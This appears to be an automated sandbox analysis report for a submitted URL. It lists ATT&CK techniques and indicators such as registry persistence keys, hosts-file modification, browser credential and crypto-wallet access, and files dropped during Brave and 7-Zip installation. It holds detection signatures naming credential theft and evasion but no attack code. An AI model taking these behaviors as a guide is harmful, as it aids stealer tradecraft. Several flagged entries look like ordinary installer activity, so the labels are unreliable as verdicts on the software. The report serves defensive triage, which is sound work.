hxxp://idk[.]com

Resubmissions

06-01-2025 15:19

250106-sqffcasjgr 8

06-01-2025 14:59

250106-scsthszjfx 10

06-01-2025 14:42

250106-r28qlayqcv 10

Analysis

max time kernel
553s
max time network
547s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
06-01-2025 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://idk.com

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\StubPath = "\"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\131.1.73.104\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\Localized Name = "Brave"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\IsInstalled = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\Version = "43,0,0,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\ = "Brave"	setup.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2932	powershell.exe
868	powershell.exe
5016	powershell.exe
1096	powershell.exe
3692	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BraveUpdate.exe	BraveUpdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BraveUpdate.exe\DisableExceptionChainValidation = "0"	BraveUpdate.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5132	cmd.exe
4320	powershell.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
3764	BraveBrowserSetup-BRV002.exe
3504	BraveUpdate.exe
3080	BraveUpdate.exe
2952	BraveUpdate.exe
4716	BraveUpdateComRegisterShell64.exe
3772	BraveUpdateComRegisterShell64.exe
2564	BraveUpdateComRegisterShell64.exe
4428	BraveUpdate.exe
3512	BraveUpdate.exe
1860	BraveUpdate.exe
2608	brave_installer-x64.exe
864	setup.exe
912	setup.exe
4600	setup.exe
3300	setup.exe
1344	BraveUpdate.exe
3816	BraveUpdateOnDemand.exe
784	BraveUpdate.exe
4276	brave.exe
4244	brave.exe
4148	brave.exe
1868	brave.exe
1948	brave.exe
1428	elevation_service.exe
4504	brave.exe
700	brave.exe
3624	brave.exe
4552	brave.exe
3416	brave.exe
4376	brave.exe
1816	brave.exe
580	brave.exe
1396	brave.exe
2760	brave.exe
4076	chrmstp.exe
1520	chrmstp.exe
2780	chrmstp.exe
2948	chrmstp.exe
568	brave.exe
3200	brave.exe
3196	brave.exe
4772	brave.exe
3500	brave.exe
2760	brave.exe
4036	brave.exe
2164	brave.exe
2996	brave.exe
4596	brave.exe
4540	brave.exe
3356	brave.exe
4384	brave.exe
1356	brave.exe
1632	brave.exe
5440	brave.exe
5672	brave.exe
6060	brave.exe
3412	brave.exe
5172	brave.exe
5308	brave.exe
5400	brave.exe
5652	brave.exe
5780	brave.exe
5860	brave.exe
1964	brave.exe

Loads dropped DLL 64 IoCs

pid	Process
3504	BraveUpdate.exe
3080	BraveUpdate.exe
2952	BraveUpdate.exe
4716	BraveUpdateComRegisterShell64.exe
2952	BraveUpdate.exe
3772	BraveUpdateComRegisterShell64.exe
2952	BraveUpdate.exe
2564	BraveUpdateComRegisterShell64.exe
2952	BraveUpdate.exe
4428	BraveUpdate.exe
3512	BraveUpdate.exe
1860	BraveUpdate.exe
1860	BraveUpdate.exe
3512	BraveUpdate.exe
1344	BraveUpdate.exe
784	BraveUpdate.exe
784	BraveUpdate.exe
4276	brave.exe
4244	brave.exe
4276	brave.exe
4148	brave.exe
1868	brave.exe
4148	brave.exe
4148	brave.exe
4148	brave.exe
4148	brave.exe
1948	brave.exe
1868	brave.exe
1948	brave.exe
4148	brave.exe
4148	brave.exe
4148	brave.exe
4504	brave.exe
700	brave.exe
700	brave.exe
4504	brave.exe
3624	brave.exe
3624	brave.exe
4552	brave.exe
3416	brave.exe
3416	brave.exe
4552	brave.exe
4376	brave.exe
4376	brave.exe
1816	brave.exe
1816	brave.exe
580	brave.exe
580	brave.exe
1396	brave.exe
1396	brave.exe
2760	brave.exe
2760	brave.exe
3200	brave.exe
3200	brave.exe
3196	brave.exe
568	brave.exe
568	brave.exe
3196	brave.exe
4772	brave.exe
4772	brave.exe
3500	brave.exe
3500	brave.exe
2760	brave.exe
2760	brave.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
155	camo.githubusercontent.com
156	camo.githubusercontent.com
169	raw.githubusercontent.com
188	raw.githubusercontent.com
193	camo.githubusercontent.com
2	raw.githubusercontent.com
9	camo.githubusercontent.com
153	raw.githubusercontent.com
154	camo.githubusercontent.com
170	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
259	ip-api.com
264	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Checks system information in the registry 2 TTPs 4 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	brave.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	brave.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	brave.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	brave.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
2904	tasklist.exe
4204	tasklist.exe
4540	tasklist.exe
2288	tasklist.exe
6008	tasklist.exe
4888	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5716	cmd.exe

UPX packed file 45 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001b00000002afa5-2795.dat	upx
behavioral1/memory/5492-4246-0x00007FF824780000-0x00007FF824D69000-memory.dmp	upx
behavioral1/memory/5492-4247-0x00007FF842FD0000-0x00007FF842FF3000-memory.dmp	upx
behavioral1/memory/5492-4248-0x00007FF843E00000-0x00007FF843E0F000-memory.dmp	upx
behavioral1/memory/5492-4253-0x00007FF842FA0000-0x00007FF842FCD000-memory.dmp	upx
behavioral1/memory/5492-4254-0x00007FF842F80000-0x00007FF842F99000-memory.dmp	upx
behavioral1/memory/5492-4255-0x00007FF83B030000-0x00007FF83B053000-memory.dmp	upx
behavioral1/memory/5492-4256-0x00007FF825630000-0x00007FF8257A7000-memory.dmp	upx
behavioral1/memory/5492-4257-0x00007FF8425C0000-0x00007FF8425D9000-memory.dmp	upx
behavioral1/memory/5492-4259-0x00007FF83AFF0000-0x00007FF83B023000-memory.dmp	upx
behavioral1/memory/5492-4258-0x00007FF842F70000-0x00007FF842F7D000-memory.dmp	upx
behavioral1/memory/5492-4261-0x00007FF83A330000-0x00007FF83A3FD000-memory.dmp	upx
behavioral1/memory/5492-4260-0x00007FF824780000-0x00007FF824D69000-memory.dmp	upx
behavioral1/memory/5492-4264-0x00007FF842FD0000-0x00007FF842FF3000-memory.dmp	upx
behavioral1/memory/5492-4263-0x00007FF824250000-0x00007FF824772000-memory.dmp	upx
behavioral1/memory/5492-4267-0x00007FF83EC40000-0x00007FF83EC4D000-memory.dmp	upx
behavioral1/memory/5492-4266-0x00007FF842FA0000-0x00007FF842FCD000-memory.dmp	upx
behavioral1/memory/5492-4265-0x00007FF841760000-0x00007FF841774000-memory.dmp	upx
behavioral1/memory/5492-4269-0x00007FF825510000-0x00007FF82562C000-memory.dmp	upx
behavioral1/memory/5492-4268-0x00007FF842F80000-0x00007FF842F99000-memory.dmp	upx
behavioral1/memory/5492-4291-0x00007FF83B030000-0x00007FF83B053000-memory.dmp	upx
behavioral1/memory/5492-4302-0x00007FF825630000-0x00007FF8257A7000-memory.dmp	upx
behavioral1/memory/5492-4381-0x00007FF8425C0000-0x00007FF8425D9000-memory.dmp	upx
behavioral1/memory/5492-4442-0x00007FF83AFF0000-0x00007FF83B023000-memory.dmp	upx
behavioral1/memory/5492-4456-0x00007FF83A330000-0x00007FF83A3FD000-memory.dmp	upx
behavioral1/memory/5492-4476-0x00007FF824250000-0x00007FF824772000-memory.dmp	upx
behavioral1/memory/5492-4478-0x00007FF824780000-0x00007FF824D69000-memory.dmp	upx
behavioral1/memory/5492-4492-0x00007FF825510000-0x00007FF82562C000-memory.dmp	upx
behavioral1/memory/5492-4484-0x00007FF825630000-0x00007FF8257A7000-memory.dmp	upx
behavioral1/memory/5492-4479-0x00007FF842FD0000-0x00007FF842FF3000-memory.dmp	upx
behavioral1/memory/5492-4513-0x00007FF824780000-0x00007FF824D69000-memory.dmp	upx
behavioral1/memory/5492-4533-0x00007FF83B030000-0x00007FF83B053000-memory.dmp	upx
behavioral1/memory/5492-4538-0x00007FF83A330000-0x00007FF83A3FD000-memory.dmp	upx
behavioral1/memory/5492-4537-0x00007FF83AFF0000-0x00007FF83B023000-memory.dmp	upx
behavioral1/memory/5492-4536-0x00007FF842F70000-0x00007FF842F7D000-memory.dmp	upx
behavioral1/memory/5492-4535-0x00007FF8425C0000-0x00007FF8425D9000-memory.dmp	upx
behavioral1/memory/5492-4534-0x00007FF825630000-0x00007FF8257A7000-memory.dmp	upx
behavioral1/memory/5492-4532-0x00007FF842F80000-0x00007FF842F99000-memory.dmp	upx
behavioral1/memory/5492-4531-0x00007FF842FA0000-0x00007FF842FCD000-memory.dmp	upx
behavioral1/memory/5492-4530-0x00007FF843E00000-0x00007FF843E0F000-memory.dmp	upx
behavioral1/memory/5492-4529-0x00007FF842FD0000-0x00007FF842FF3000-memory.dmp	upx
behavioral1/memory/5492-4528-0x00007FF824250000-0x00007FF824772000-memory.dmp	upx
behavioral1/memory/5492-4527-0x00007FF825510000-0x00007FF82562C000-memory.dmp	upx
behavioral1/memory/5492-4526-0x00007FF83EC40000-0x00007FF83EC4D000-memory.dmp	upx
behavioral1/memory/5492-4525-0x00007FF841760000-0x00007FF841774000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_sw.dll	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Extensions\external_extensions.json	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\am.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\te.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\resources\brave_extension\_locales\fi\messages.json	setup.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_de.dll	BraveUpdate.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_fa.dll	BraveUpdate.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_hr.dll	BraveUpdate.exe
File opened for modification	C:\Program Files\7-Zip\Lang\de.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sa.txt	7z2409-x64.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_es.dll	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\es.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\resources\brave_extension\_locales\fil\messages.json	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\resources\brave_extension\_locales\kn\messages.json	setup.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	7z2409-x64.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateComRegisterShell64.exe	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\af.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\vi.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe	setup.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku-ckb.txt	7z2409-x64.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_uk.dll	BraveUpdate.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\psmachine.dll	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\tr.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\en-GB.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\ur.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\chrome.VisualElementsManifest.xml	setup.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\Recovery\GURE8C3.tmp\BraveUpdateSetup.crx3	BraveUpdate.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_nl.dll	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\BraveVpnWireguardService\wireguard.dll	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\bg.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\dxil.dll	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\fr.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\he.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\resources\brave_extension\_locales\am\messages.json	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Application\SetupMetrics\72775f12-90b5-4be0-8e51-26d81545958e.tmp	setup.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_fil.dll	BraveUpdate.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_ur.dll	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\chrome_100_percent.pak	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\resources\brave_extension\_locales\gu\messages.json	setup.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\resources\brave_extension\_locales\id\messages.json	setup.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandlerArm64.exe	BraveUpdate.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\SETUP.EX_	brave_installer-x64.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\chrome_200_percent.pak	setup.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2409-x64.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_ru.dll	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\Locales\hi.pak	setup.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt	7z2409-x64.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	7z2409-x64.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_sk.dll	BraveUpdate.exe
File opened for modification	C:\Program Files (x86)\BraveSoftware\Update\Download\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\131.1.73.104\brave_installer-x64.exe	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\resources\brave_extension\_locales\it\messages.json	setup.exe
File created	C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\goopdateres_pl.dll	BraveUpdate.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\MEIPreload\manifest.json	setup.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll.tmp	7z2409-x64.exe
File created	C:\Program Files\BraveSoftware\Brave-Browser\Temp\source864_1506092934\Chrome-bin\131.1.73.104\resources\brave_extension\_locales\zh_TW\messages.json	setup.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\GUM5197.tmp\psmachine_arm64.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_fi.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\BraveUpdateSetup.exe\:Zone.Identifier:$DATA	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-en-gb.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1562393420\sean-o-riordan.jpg	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_2007937969\manifest.fingerprint	brave.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\psmachine.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\BraveUpdateComRegisterShellArm64.exe	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1887878395\1\scripts\brave_rewards\publisher\reddit\redditBase.bundle.js	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1517238902\manifest.fingerprint	brave.exe
File opened for modification	C:\Windows\SystemTemp	chrmstp.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\manifest.json	brave.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_hr.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\chrome_url_fetcher_4276_593618801\extension_1_0_1023.crx	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1517238902\22c36fbe-bc7e-4032-9916-7714e2c2c1ed.jpg	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1562393420\spencer-moore-3.jpg	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-nb.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-el.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1086954611\list.txt	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_532912848\safety_tips.pb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-tk.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-te.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-en-us.hyb	brave.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_tr.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-mr.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-gl.hyb	brave.exe
File opened for modification	C:\Windows\SystemTemp	brave.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\psuser.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_fr.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_pl.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1887878395\1\localhost-permission-allow-list.txt	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_292524803\manifest.json	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-cs.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_893476634\mapping-table.json	brave.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	chrmstp.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1646146476\manifest.fingerprint	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-sl.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-es.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1470231600\manifest.fingerprint	brave.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1775331799\manifest.fingerprint	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_527047798\list.txt	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1008418918\metadata.pb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-fr.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1906038878\manifest.json	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-lv.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-de-ch-1901.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-uk.hyb	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-cu.hyb	brave.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_en-GB.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_hu.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_527047798\brave_metadata\verified_contents.json	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1562393420\aleks-eva-1.jpg	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_2007937969\manifest.json	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-ta.hyb	brave.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_it.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_ja.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\chrome_url_fetcher_4276_411180895\extension_1_0_9937.crx	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1562393420\StudentNTP_Luke-Berrigan_x1280.jpg	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1562393420\StudentNTP_Sam-Richter_x0825_WINNER.jpg	brave.exe
File created	C:\Windows\SystemTemp\chrome_url_fetcher_4276_477734071\7_all_sslErrorAssistant.crx3	brave.exe
File created	C:\Windows\SystemTemp\GUM5197.tmp\goopdateres_hi.dll	BraveBrowserSetup-BRV002.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1086954611\manifest.json	brave.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4276_1173646099\hyph-sq.hyb	brave.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\BraveBrowserSetup-BRV002.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Desktop\7z2409-x64.exe:Zone.Identifier	brave.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z2409-x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveUpdate.exe
